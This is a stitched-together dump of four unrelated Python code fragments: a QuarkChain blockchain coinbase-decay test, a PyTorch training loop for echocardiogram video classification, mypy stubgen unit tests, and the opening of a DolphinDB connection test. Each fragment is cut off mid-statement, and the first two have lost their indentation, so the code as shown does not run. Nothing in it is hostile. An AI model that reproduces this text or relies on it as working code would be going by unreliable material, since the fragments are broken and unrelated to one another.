rb3 = rb0.create_block_to_append(difficulty=int(3e6)).finalize(coinbase)
# rb3 should be added as the tip
self.assertTrue(r_state.add_block(rb1))
self.assertTrue(r_state.add_block(rb2))
self.assertTrue(r_state.add_block(rb3))
self.assertEqual(r_state.tip.get_hash(), rb3.header.get_hash())
def test_root_coinbase_decay(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
coinbase = r_state._calculate_root_block_coinbase(
[], env.quark_chain_config.ROOT.EPOCH_INTERVAL
)
self.assertEqual(
coinbase,
{
env.quark_chain_config.genesis_token: env.quark_chain_config.ROOT.COINBASE_AMOUNT
* env.quark_chain_config.BLOCK_REWARD_DECAY_FACTOR
},
)
coinbase = r_state._calculate_root_block_coinbase(
[], env.quark_chain_config.ROOT.EPOCH_INTERVAL + 1
)
self.assertEqual(
coinbase,
{
env.quark_chain_config.genesis_token: env.quark_chain_config.ROOT.COINBASE_AMOUNT
* env.quark_chain_config.BLOCK_REWARD_DECAY_FACTOR
},
)
coinbase = r_state._calculate_root_block_coinbase(
[], env.quark_chain_config.ROOT.EPOCH_INTERVAL * 2
)
self.assertEqual(
coinbase,
{
env.quark_chain_config.genesis_token: env.quark_chain_config.ROOT.COINBASE_AMOUNT
* env.quark_chain_config.BLOCK_REWARD_DECAY_FACTOR ** | |
"""Functions for training and running group classification."""
import math
import os
import time
import datetime
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.utils.extmath import softmax
from scipy.special import expit
from sklearn.metrics import f1_score, fbeta_score, classification_report, confusion_matrix, average_precision_score, roc_auc_score
import sklearn
import torch
import torchvision
import tqdm
import pdb
import hha
def run(num_epochs=100,
file_list='FileList_hha_firstEncountersValTest.csv',
modelname="r2plus1d_18",
tasks="Group",
frames=32,
period=2,
pretrained=True,
output=None,
device=None,
n_train_patients=None,
num_workers=5,
batch_size=20,
seed=0,
lr_step_period=15,
run_test=False,
binary=True,
nodes=1,
bias=None,
weighted=False,
oversample=False,
optimizer=None,
rank_auprc=False,
singleframe=False,
singleframe_ed=False,
segmentation_mask=False,
segmentation_mask_invert=False,
downsample=None,
segmentation=False,
segmentation_outline=False,
segmentation_params=None,
loss_funct=None
):
"""Trains/tests classification model.
Args:
num_epochs (int, optional): Number of epochs during training
Defaults to 45.
modelname (str, optional): Name of model. One of ``mc3_18'',
``r2plus1d_18'', or ``r3d_18''
(options are torchvision.models.video.<modelname>)
Defaults to ``r2plus1d_18''.
tasks (str, optional): Name of task to predict. Options are the headers
of FileList.csv.
Defaults to ``group''.
pretrained (bool, optional): Whether to use pretrained weights for model
Defaults to True.
output (str or None, optional): Name of directory to place outputs
Defaults to None (replaced by output/video/<modelname>_<pretrained/random>/).
device (str or None, optional): Name of device to run on. See
https://pytorch.org/docs/stable/tensor_attributes.html#torch.torch.device
for options. If ``None'', defaults to ``cuda'' if available, and ``cpu'' otherwise.
Defaults to ``None''.
n_train_patients (str or None, optional): Number of training patients. Used to ablations
on number of training patients. If ``None'', all patients used.
Defaults to ``None''.
num_workers (int, optional): how many subprocesses to use for data
loading. If 0, the data will be loaded in the main process.
Defaults to 5.
binary (bool, required): Whether to train binary classification
Defaults to True.
batch_size (int, optional): how many samples per batch to load
Defaults to 20.
seed (int, optional): Seed for random number generator.
Defaults to 0.
lr_step_period (int or None, optional): Period of learning rate decay
(learning rate is decayed by a multiplicative factor of 0.1)
If ``None'', learning rate is not decayed.
Defaults to 15.
run_test (bool, optional): Whether or not to run on test.
Defaults to False.
nodes (int, required): numbers of nodes, representing number of classes,
Defaults to 1, for binary case.
bias (float, optional): Add bias to final layer of model, default: 0.0
weighted (bool, optional): Decides whether or not to weigh classes during training, default: False
optimizer (str, optional): What optimizer to use, default: False
singleframe
singleframe_ed=False,
segmentation_mask=False,
segmentation_mask_invert=False,
downsample=None
"""
## Seed RNGs
np.random.seed(seed)
torch.manual_seed(seed)
## Setting default output directory
print(output)
if output is not None:
output = os.path.join(output, "video", "{}_{}_{}_{}_{}_{}_{}_{}".format(modelname,
frames,
period,
"pretrained" if pretrained else "random",
"weighted" if weighted else "nonweighted",
"oversampled" if oversample else "nonoversampled",
"bias" if bias else "nobias",
"SGD" if optimizer == 'SGD' else "adam",
))
else:
output = os.path.join('output', "video", "{}_{}_{}_{}_{}_{}_{}_{}".format(modelname,
frames,
period,
"pretrained" if pretrained else "random",
"weighted" if weighted else "nonweighted",
"oversampled" if oversample else "nonoversampled",
"bias" if bias else "nobias",
"SGD" if optimizer == 'SGD' else "adam",
))
# Augmentation studies
if singleframe:
output += "_singleframeRandom"
if singleframe_ed:
output += "_singleframeEndDiastolic"
if segmentation_mask:
output += "_segmentationmask"
if segmentation_mask_invert:
output += "_segmentationmaskInvert"
if downsample:
output += "_downsample" + str(downsample)
if segmentation:
output += "_segmentation"
if segmentation_outline:
output += "_segmentationOutline"
if segmentation_params is not None:
output += "segmentationParams"
### Making directory is does not exist
os.makedirs(output, exist_ok=True)
## Setting device for computations
if device is None:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
## Setting up model
model = torchvision.models.video.__dict__[modelname](pretrained=pretrained)
## Adding last layer of nodes
node = nodes
model.fc = torch.nn.Linear(model.fc.in_features, node)
## Initializing well:atural log(pos/neg) for final bias term #natural log(pos/total) for final bias term
if bias:
if nodes == 1:
bias_terms = [-0.48] #bias_wt #[-0.48]
model.fc.bias.data = torch.tensor(bias_terms)
## TODO: Add an option for normal bias setting etc
if nodes == 3:
bias_terms = [0.0, -0.48, -3.92]
model.fc.bias.data = torch.tensor(bias_terms)
if not bias:
bias_terms = [0.0] * nodes
model.fc.bias.data = torch.tensor(bias_terms)
#pdb.set_trace()
## Implementing data parallelism at the module level.
if device.type == "cuda":
model = torch.nn.DataParallel(model)
model.to(device)
# Set up optimizer: Default sgd
optim = torch.optim.SGD(model.parameters(), lr=1e-3, momentum=0.9, weight_decay=1e-3)
if lr_step_period is None:
lr_step_period = math.inf
scheduler = torch.optim.lr_scheduler.StepLR(optim, lr_step_period)
if optimizer == 'adam':
learning_rate = 1e-4
optim = torch.optim.Adam(model.parameters(), lr=learning_rate)
print(optimizer)
## Computing mean and std
print(file_list)
mean, std = hha.utils.get_mean_and_std(hha.datasets.Echo(split="train", file_list=file_list))
kwargs = {"target_type": tasks,
"mean": mean,
"std": std,
"length": frames,
"period": period,
"file_list":file_list,
"singleframe":singleframe,
"singleframe_ed": singleframe_ed,
"segmentation_mask":segmentation_mask,
"segmentation_mask_invert": segmentation_mask_invert,
"downsample": downsample,
"segmentation_outline":segmentation_outline
}
#if segmentation_params is not None:
# kwargs['segmentation_params']={"mask": True, "mitral": False, "expand": 15, "rect":True, "reverse":True}
## Setting up datasets and dataloaders
train_dataset = hha.datasets.Echo(split="train", **kwargs, pad=12)
if singleframe:
## Testing for a truly single frame video
sfv = train_dataset.__getitem__(0)
assert np.array_equal(sfv[0][:,np.random.choice(sfv[0].shape[1], 1),:,:], sfv[0][:,np.random.choice(sfv[0].shape[1], 1),:,:])
if n_train_patients is not None and len(train_dataset) > n_train_patients:
# Subsample patients (used for ablation experiment)
indices = np.random.choice(len(train_dataset), n_train_patients, replace=False)
train_dataset = torch.utils.data.Subset(train_dataset, indices)
train_dataloader = torch.utils.data.DataLoader(train_dataset
, batch_size=batch_size
, num_workers=num_workers
, shuffle=True
, pin_memory=(device.type == "cuda")
, drop_last=True)
val_dataloader = torch.utils.data.DataLoader(hha.datasets.Echo(split="validate", **kwargs)
, batch_size=batch_size
, num_workers=num_workers
, shuffle=True
, pin_memory=(device.type == "cuda"))
dataloaders = {'train': train_dataloader, 'validate': val_dataloader}
if oversample and not weighted:
#############
# Oversample the minority classes
outcome = train_dataset.outcome
targets = [j[1] for j in outcome ]
class_count = np.unique(targets, return_counts=True)[1]
print(class_count)
weight = 1. / class_count
samples_weight = torch.from_numpy(np.array([weight[int(float(t))] for t in targets]))
sampler = torch.utils.data.sampler.WeightedRandomSampler(samples_weight, len(samples_weight)) #len(samples_weight))
weighted_loader = torch.utils.data.DataLoader(train_dataset
, batch_size=batch_size
, num_workers=num_workers
, shuffle=False
, pin_memory=(device.type == "cuda")
, drop_last=True
, sampler=sampler)
dataloaders = {'train': weighted_loader, 'validate': val_dataloader}
#############
# Run training and testing loops
with open(os.path.join(output, "log.csv"), "a") as f:
epoch_resume = 0
bestLoss = float("inf")
bestauPRC = float(0.)
try:
# Attempt to load checkpoint
checkpoint = torch.load(os.path.join(output, "checkpoint.pt"))
model.load_state_dict(checkpoint['state_dict'])
optim.load_state_dict(checkpoint['opt_dict'])
scheduler.load_state_dict(checkpoint['scheduler_dict'])
epoch_resume = checkpoint["epoch"] + 1
bestLoss = checkpoint["best_loss"]
f.write("Resuming from epoch {}\n".format(epoch_resume))
except FileNotFoundError:
f.write("Starting run from scratch\n")
for epoch in range(epoch_resume, num_epochs):
print("Epoch #{}".format(epoch), flush=True)
for phase in ['train', 'validate']:
start_time = time.time()
for i in range(torch.cuda.device_count()):
torch.cuda.reset_max_memory_allocated(i)
torch.cuda.reset_max_memory_cached(i)
## Running current epoch
loss, yhat, y, epoch_metrics, __ = hha.utils.video_dev.run_epoch(model
, dataloaders[phase]
, phase == "train"
, optim
, device
, binary=binary
, weighted=weighted
, loss_funct=loss_funct)
## Writing to file
if binary:
threshold = 0.5
yhat = expit(yhat)
metrics_predictions_ndx = 1
predictions = epoch_metrics[:, metrics_predictions_ndx]
calculated_metrics = pd.DataFrame(log_epoch_metrics(epoch_metrics))
print(roc_auc_score(y, yhat, average='weighted'))
print(average_precision_score(y, yhat, average='weighted'))
auprc = average_precision_score(y, yhat, average='weighted')
f.write("{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\n".format(epoch
, phase
, loss
, calculated_metrics['0.0']['loss']
, calculated_metrics['1.0']['loss']
, f1_score(y, predictions, average='weighted')
, calculated_metrics['0.0']['f1-score']
, calculated_metrics['1.0']['f1-score']
, roc_auc_score(y, yhat, average='weighted')
, average_precision_score(y, yhat, average='weighted')
, time.time() - start_time
, y.size
, sum(torch.cuda.max_memory_allocated() for i in range(torch.cuda.device_count()))
, sum(torch.cuda.max_memory_cached() for i in range(torch.cuda.device_count()))
, batch_size))
else:
yhat = softmax(yhat)
metrics_predictions_ndx = 1
predictions = epoch_metrics[:, metrics_predictions_ndx]
y_encode = np.eye(np.int(y.max()+1))[y.astype(int)]
calculated_metrics = pd.DataFrame(log_epoch_metrics(epoch_metrics))
print(roc_auc_score(y_encode, yhat, average='weighted'))
print(average_precision_score(y_encode, yhat , average='weighted'))
auprc = average_precision_score(y_encode, yhat, average='weighted')
per_class_loss = calculated_metrics[[str(j) for j in np.arange(0, nodes).astype(float)]].loc['loss'].values.tolist()
per_class_f1score = calculated_metrics[[str(j) for j in np.arange(0, nodes).astype(float)]].loc['f1-score'].values.tolist()
line_out = [epoch, phase, loss] + per_class_loss + [f1_score(y, predictions, average='weighted')] + per_class_f1score + [roc_auc_score(y_encode, yhat, average='weighted')] + [average_precision_score(y_encode, yhat, average='weighted')] + [time.time() - start_time] + [y.size] + [sum(torch.cuda.max_memory_allocated() for i in range(torch.cuda.device_count()))] + [sum(torch.cuda.max_memory_cached() for i in range(torch.cuda.device_count()))] + [batch_size]
f.write(",".join(str(np.round(x,4)) if isinstance(x, np.float32) else str(x) for x in line_out) + '\n')
f.flush()
scheduler.step()
# Save checkpoint
save = {
'epoch': epoch,
'state_dict': model.state_dict(),
'period': period,
'frames': frames,
'best_loss': bestLoss,
'loss': loss,
'auprc': auprc,
'opt_dict': optim.state_dict(),
'scheduler_dict': scheduler.state_dict(),
}
torch.save(save, os.path.join(output, "checkpoint.pt"))
if loss < bestLoss:
torch.save(save, os.path.join(output, "best.pt"))
bestLoss = loss
if auprc > bestauPRC:
torch.save(save, os.path.join(output, "best_auprc.pt"))
bestauPRC = auprc
if rank_auprc:
# Loading best weights for highest auPRC
checkpoint = torch.load(os.path.join(output, "best_auprc.pt"), map_location=device)
print(os.path.join(output, "best_auprc.pt"))
model.load_state_dict(checkpoint['state_dict'])
optim.load_state_dict(checkpoint['opt_dict'])
scheduler.load_state_dict(checkpoint['scheduler_dict'])
for state in optim.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.to(device)
f.write("Best auPRC {} from epoch {}\n".format(checkpoint["auprc"], checkpoint["epoch"]))
f.flush()
else:
# Loading best weights according to lowest loss
checkpoint = torch.load(os.path.join(output, "best.pt"))
print(os.path.join(output, "best.pt"))
model.load_state_dict(checkpoint['state_dict'])
f.write("Best validation loss {} from | |
import glob
import os.path
import shutil
import sys
import tempfile
import re
from types import ModuleType
from typing import List, Tuple
from mypy.test.helpers import Suite, assert_equal, assert_string_arrays_equal
from mypy.test.data import DataSuite, DataDrivenTestCase
from mypy.errors import CompileError
from mypy.stubgen import (
generate_stubs, parse_options, walk_packages, Options, collect_build_targets,
mypy_options
)
from mypy.stubgenc import generate_c_type_stub, infer_method_sig, generate_c_function_stub
from mypy.stubdoc import (
parse_signature, parse_all_signatures, build_signature, find_unique_signatures,
infer_sig_from_docstring, infer_prop_type_from_docstring, FunctionSig, ArgSig,
infer_arg_sig_from_docstring
)
class StubgenCmdLineSuite(Suite):
    """Tests for collecting stub-generation build targets from CLI options."""

    def test_files_found(self) -> None:
        prev_cwd = os.getcwd()
        with tempfile.TemporaryDirectory() as tmp_dir:
            try:
                os.chdir(tmp_dir)
                os.mkdir('subdir')
                self.make_file('subdir', 'a.py')
                self.make_file('subdir', 'b.py')
                os.mkdir(os.path.join('subdir', 'pack'))
                self.make_file('subdir', 'pack', '__init__.py')
                options = parse_options(['subdir'])
                py_mods, c_mods = collect_build_targets(options, mypy_options(options))
                assert_equal(c_mods, [])
                found = {mod.path for mod in py_mods}
                expected = {
                    os.path.join('subdir', 'pack', '__init__.py'),
                    os.path.join('subdir', 'a.py'),
                    os.path.join('subdir', 'b.py'),
                }
                assert_equal(found, expected)
            finally:
                # Always restore the working directory for later tests.
                os.chdir(prev_cwd)

    def test_packages_found(self) -> None:
        prev_cwd = os.getcwd()
        with tempfile.TemporaryDirectory() as tmp_dir:
            try:
                os.chdir(tmp_dir)
                os.mkdir('pack')
                self.make_file('pack', '__init__.py', content='from . import a, b')
                self.make_file('pack', 'a.py')
                self.make_file('pack', 'b.py')
                options = parse_options(['-p', 'pack'])
                py_mods, c_mods = collect_build_targets(options, mypy_options(options))
                assert_equal(c_mods, [])
                found = {os.path.relpath(mod.path or 'FAIL') for mod in py_mods}
                expected = {
                    os.path.join('pack', '__init__.py'),
                    os.path.join('pack', 'a.py'),
                    os.path.join('pack', 'b.py'),
                }
                assert_equal(found, expected)
            finally:
                os.chdir(prev_cwd)

    def make_file(self, *path: str, content: str = '') -> None:
        """Create (or overwrite) the file at the joined *path* segments."""
        with open(os.path.join(*path), 'w') as f:
            f.write(content)
class StubgenCliParseSuite(Suite):
    """Tests for expanding package specifications into module name sets."""

    def test_walk_packages(self) -> None:
        # A single module expands to just itself.
        assert_equal(set(walk_packages(["mypy.errors"])), {"mypy.errors"})
        # Multiple modules are all preserved.
        assert_equal(
            set(walk_packages(["mypy.errors", "mypy.stubgen"])),
            {"mypy.errors", "mypy.stubgen"},
        )
        # Walking the top-level package picks up at least these submodules.
        expected_subset = {
            "mypy",
            "mypy.errors",
            "mypy.stubgen",
            "mypy.test",
            "mypy.test.helpers",
        }
        self.assertTrue(set(walk_packages(["mypy"])).issuperset(expected_subset))
class StubgenUtilSuite(Suite):
    """Unit tests for the signature-parsing helper functions used by stubgen."""

    def test_parse_signature(self) -> None:
        self.assert_parse_signature('func()', ('func', [], []))

    def test_parse_signature_with_args(self) -> None:
        self.assert_parse_signature('func(arg)', ('func', ['arg'], []))
        self.assert_parse_signature('do(arg, arg2)', ('do', ['arg', 'arg2'], []))

    def test_parse_signature_with_optional_args(self) -> None:
        # Bracketed arguments end up in the 'optional' list of the result.
        self.assert_parse_signature('func([arg])', ('func', [], ['arg']))
        self.assert_parse_signature('func(arg[, arg2])', ('func', ['arg'], ['arg2']))
        self.assert_parse_signature('func([arg[, arg2]])', ('func', [], ['arg', 'arg2']))

    def test_parse_signature_with_default_arg(self) -> None:
        # Arguments with defaults also count as optional.
        self.assert_parse_signature('func(arg=None)', ('func', [], ['arg']))
        self.assert_parse_signature('func(arg, arg2=None)', ('func', ['arg'], ['arg2']))
        self.assert_parse_signature('func(arg=1, arg2="")', ('func', [], ['arg', 'arg2']))

    def test_parse_signature_with_qualified_function(self) -> None:
        # A leading class name is stripped from the returned function name.
        self.assert_parse_signature('ClassName.func(arg)', ('func', ['arg'], []))

    def test_parse_signature_with_kw_only_arg(self) -> None:
        self.assert_parse_signature('ClassName.func(arg, *, arg2=1)',
                                    ('func', ['arg', '*'], ['arg2']))

    def test_parse_signature_with_star_arg(self) -> None:
        self.assert_parse_signature('ClassName.func(arg, *args)',
                                    ('func', ['arg', '*args'], []))

    def test_parse_signature_with_star_star_arg(self) -> None:
        self.assert_parse_signature('ClassName.func(arg, **args)',
                                    ('func', ['arg', '**args'], []))

    def assert_parse_signature(self, sig: str, result: Tuple[str, List[str], List[str]]) -> None:
        # Helper: `result` is the expected (name, args, optional-args) triple.
        assert_equal(parse_signature(sig), result)

    def test_build_signature(self) -> None:
        assert_equal(build_signature([], []), '()')
        assert_equal(build_signature(['arg'], []), '(arg)')
        assert_equal(build_signature(['arg', 'arg2'], []), '(arg, arg2)')
        assert_equal(build_signature(['arg'], ['arg2']), '(arg, arg2=...)')
        assert_equal(build_signature(['arg'], ['arg2', '**x']), '(arg, arg2=..., **x)')

    def test_parse_all_signatures(self) -> None:
        # Malformed entries (e.g. unbalanced parentheses) are silently skipped.
        assert_equal(parse_all_signatures(['random text',
                                           '.. function:: fn(arg',
                                           '.. function:: fn()',
                                           ' .. method:: fn2(arg)']),
                     ([('fn', '()'),
                       ('fn2', '(arg)')], []))

    def test_find_unique_signatures(self) -> None:
        # Only names with exactly one distinct signature are kept.
        assert_equal(find_unique_signatures(
            [('func', '()'),
             ('func', '()'),
             ('func2', '()'),
             ('func2', '(arg)'),
             ('func3', '(arg, arg2)')]),
            [('func', '()'),
             ('func3', '(arg, arg2)')])

    def test_infer_sig_from_docstring(self) -> None:
        # Signatures without annotations default to 'Any' for the return type;
        # default values are only recorded as a default=True flag.
        assert_equal(infer_sig_from_docstring('\nfunc(x) - y', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x')], ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=None)', 'func'),
                     [FunctionSig(name='func',
                                  args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=3)', 'func'),
                     [FunctionSig(name='func',
                                  args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=[1, 2, 3])', 'func'),
                     [FunctionSig(name='func',
                                  args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
                                  ret_type='Any')])
        # Wrong function name or broken syntax yields no inferred signature.
        assert_equal(infer_sig_from_docstring('\nafunc(x) - y', 'func'), [])
        assert_equal(infer_sig_from_docstring('\nfunc(x, y', 'func'), [])
        assert_equal(infer_sig_from_docstring('\nfunc(x=z(y))', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', default=True)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc x', 'func'), [])
        # Try to infer signature from type annotation.
        assert_equal(infer_sig_from_docstring('\nfunc(x: int)', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='int')],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x: int=3)', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
                                  ret_type='int')])
        # Trailing whitespace after the return type is tolerated.
        assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int  \n', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
                                  ret_type='int')])
        # Spaces inside generic types are normalized away.
        assert_equal(infer_sig_from_docstring('\nfunc(x: Tuple[int, str]) -> str', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='Tuple[int,str]')],
                                  ret_type='str')])
        assert_equal(
            infer_sig_from_docstring('\nfunc(x: Tuple[int, Tuple[str, int], str], y: int) -> str',
                                     'func'),
            [FunctionSig(name='func',
                         args=[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]'),
                               ArgSig(name='y', type='int')],
                         ret_type='str')])
        assert_equal(infer_sig_from_docstring('\nfunc(x: foo.bar)', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='foo.bar')],
                                  ret_type='Any')])
        # Nested brackets inside default values must not confuse the parser.
        assert_equal(infer_sig_from_docstring('\nfunc(x: list=[1,2,[3,4]])', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='list', default=True)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x: str="nasty[")', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc[(x: foo.bar, invalid]', 'func'), [])
        # Un-Pythonic annotations (e.g. C++ types) degrade to an untyped arg.
        assert_equal(infer_sig_from_docstring('\nfunc(x: invalid::type<with_template>)', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type=None)],
                                  ret_type='Any')])
        assert_equal(infer_sig_from_docstring('\nfunc(x: str="")', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
                                  ret_type='Any')])

    def test_infer_sig_from_docstring_duplicate_args(self) -> None:
        # A signature with duplicated argument names is discarded in favor of
        # a later valid one.
        assert_equal(infer_sig_from_docstring('\nfunc(x, x) -> str\nfunc(x, y) -> int', 'func'),
                     [FunctionSig(name='func', args=[ArgSig(name='x'), ArgSig(name='y')],
                                  ret_type='int')])

    def test_infer_arg_sig_from_docstring(self) -> None:
        assert_equal(infer_arg_sig_from_docstring("(*args, **kwargs)"),
                     [ArgSig(name='*args'), ArgSig(name='**kwargs')])
        assert_equal(
            infer_arg_sig_from_docstring(
                "(x: Tuple[int, Tuple[str, int], str]=(1, ('a', 2), 'y'), y: int=4)"),
            [ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]', default=True),
             ArgSig(name='y', type='int', default=True)])

    def test_infer_prop_type_from_docstring(self) -> None:
        # The property type is taken from a leading 'type:' prefix only.
        assert_equal(infer_prop_type_from_docstring('str: A string.'), 'str')
        assert_equal(infer_prop_type_from_docstring('Optional[int]: An int.'), 'Optional[int]')
        assert_equal(infer_prop_type_from_docstring('Tuple[int, int]: A tuple.'),
                     'Tuple[int, int]')
        # A leading newline means there is no type prefix to extract.
        assert_equal(infer_prop_type_from_docstring('\nstr: A string.'), None)
class StubgenPythonSuite(DataSuite):
    """Data-driven end-to-end tests for stubgen (cases live in stubgen.test)."""
    required_out_section = True
    base_path = '.'
    files = ['stubgen.test']

    def run_case(self, testcase: DataDrivenTestCase) -> None:
        """Run a single data-driven stubgen test case and compare its output."""
        extra = []  # Extra command-line arguments ('-m mod' pairs).
        mods = []  # Names of the modules written out for this test case.
        source = '\n'.join(testcase.input)
        # Write the main program plus any additional files declared by the case.
        for file, content in testcase.files + [('./main.py', source)]:
            mod = os.path.basename(file)[:-3]  # strip the '.py' suffix
            mods.append(mod)
            extra.extend(['-m', mod])
            with open(file, 'w') as f:
                f.write(content)
        options = self.parse_flags(source, extra)
        out_dir = 'out'
        try:
            try:
                # Test names ending in '_import' exercise the runtime-import
                # path; names ending in '_semanal' run full semantic analysis.
                if not testcase.name.endswith('_import'):
                    options.no_import = True
                if not testcase.name.endswith('_semanal'):
                    options.parse_only = True
                generate_stubs(options, quiet=True, add_header=False)
                a = []  # type: List[str]
                self.add_file(os.path.join(out_dir, 'main.pyi'), a)
            except CompileError as e:
                # Compile errors are compared against the expected output too.
                a = e.messages
            assert_string_arrays_equal(testcase.output, a,
                                       'Invalid output ({}, line {})'.format(
                                           testcase.file, testcase.line))
        finally:
            # Unload the temporary modules and remove the generated stubs.
            for mod in mods:
                if mod in sys.modules:
                    del sys.modules[mod]
            shutil.rmtree(out_dir)

    def parse_flags(self, program_text: str, extra: List[str]) -> Options:
        """Build stubgen Options from a '# flags: ...' comment plus extra args."""
        flags = re.search('# flags: (.*)$', program_text, flags=re.MULTILINE)
        if flags:
            flag_list = flags.group(1).split()
        else:
            flag_list = []
        return parse_options(flag_list + extra)

    def add_file(self, path: str, result: List[str]) -> None:
        """Append the lines of the file at `path` to `result`."""
        with open(path, encoding='utf8') as file:
            result.extend(file.read().splitlines())
class StubgencSuite(Suite):
def test_infer_hash_sig(self) -> None:
assert_equal(infer_method_sig('__hash__'), [])
def test_infer_getitem_sig(self) -> None:
assert_equal(infer_method_sig('__getitem__'), [ArgSig(name='index')])
def test_infer_setitem_sig(self) -> None:
assert_equal(infer_method_sig('__setitem__'),
[ArgSig(name='index'), ArgSig(name='object')])
def test_infer_binary_op_sig(self) -> None:
for op in ('eq', 'ne', 'lt', 'le', 'gt', 'ge',
'add', 'radd', 'sub', 'rsub', 'mul', 'rmul'):
assert_equal(infer_method_sig('__%s__' % op), [ArgSig(name='other')])
def test_infer_unary_op_sig(self) -> None:
for op in ('neg', 'pos'):
assert_equal(infer_method_sig('__%s__' % op), [])
def test_generate_c_type_stub_no_crash_for_object(self) -> None:
output = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
imports = [] # type: List[str]
generate_c_type_stub(mod, 'alias', object, output, imports)
assert_equal(imports, [])
assert_equal(output[0], 'class alias:')
    def test_generate_c_type_stub_variable_type_annotation(self) -> None:
        """A class variable appears in the stub as an 'Any = ...' annotation."""
        # This class mimics the stubgen unit test 'testClassVariable'
        class TestClassVariableCls:
            x = 1
        output = []  # type: List[str]
        imports = []  # type: List[str]
        mod = ModuleType('module', '')  # any module is fine
        generate_c_type_stub(mod, 'C', TestClassVariableCls, output, imports)
        assert_equal(imports, [])
        assert_equal(output, ['class C:', ' x: Any = ...'])
def test_generate_c_type_inheritance(self) -> None:
class TestClass(KeyError):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module, ')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(KeyError): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_same_module(self) -> None:
class TestBaseClass:
pass
class TestClass(TestBaseClass):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestBaseClass.__module__, '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(TestBaseClass): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_other_module(self) -> None:
import argparse
class TestClass(argparse.Action):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(argparse.Action): ...', ])
assert_equal(imports, ['import argparse'])
    def test_generate_c_type_with_docstring(self) -> None:
        """The docstring signature overrides the Python annotation."""
        # The docstring says 'arg0: int' while the annotation says 'arg0: str';
        # the generated stub must use the docstring's type.
        class TestClass:
            def test(self, arg0: str) -> None:
                """
                test(self: TestClass, arg0: int)
                """
                pass
        output = []  # type: List[str]
        imports = []  # type: List[str]
        mod = ModuleType(TestClass.__module__, '')
        generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
                                 self_var='self', class_name='TestClass')
        assert_equal(output, ['def test(self, arg0: int) -> Any: ...'])
        assert_equal(imports, [])
    def test_generate_c_type_with_docstring_empty_default(self) -> None:
        """An empty-string default in the docstring is rendered as '...'."""
        class TestClass:
            def test(self, arg0: str = "") -> None:
                """
                test(self: TestClass, arg0: str = "")
                """
                pass
        output = []  # type: List[str]
        imports = []  # type: List[str]
        mod = ModuleType(TestClass.__module__, '')
        generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
                                 self_var='self', class_name='TestClass')
        assert_equal(output, ['def test(self, arg0: str = ...) -> Any: ...'])
        assert_equal(imports, [])
    def test_generate_c_function_other_module_arg(self) -> None:
        """Test that if argument references type from other module, module will be imported."""
        # Provide different type in python spec than in docstring to make sure, that docstring
        # information is used.
        def test(arg0: str) -> None:
            """
            test(arg0: argparse.Action)
            """
            pass
        output = []  # type: List[str]
        imports = []  # type: List[str]
        mod = ModuleType(self.__module__, '')
        generate_c_function_stub(mod, 'test', test, output, imports)
        # The stub references argparse.Action, so 'import argparse' is emitted.
        assert_equal(output, ['def test(arg0: argparse.Action) -> Any: ...'])
        assert_equal(imports, ['import argparse'])
def test_generate_c_function_same_module_arg(self) -> None:
"""Test that if argument references type from same module but using full path, no module
will be imported, and type specification will be striped to local reference.
"""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('argparse', '')
| |
<gh_stars>1-10
import sys
sys.path.append('..')
import dolphindb as ddb
import numpy as np
from datetime import datetime
from dolphindb import session
from dolphindb import *
# from xxdb_server import HOST, PORT
HOST = "172.16.95.128"
PORT = 8921
if __name__ == '__main__':
conn = ddb.session()
success = conn.connect(HOST, PORT)
id = 1;
if success:
# print("hello")
print("---------------------------------------------------",id)
id += 1
print("Testing double Vector")
timeStart = datetime.now()
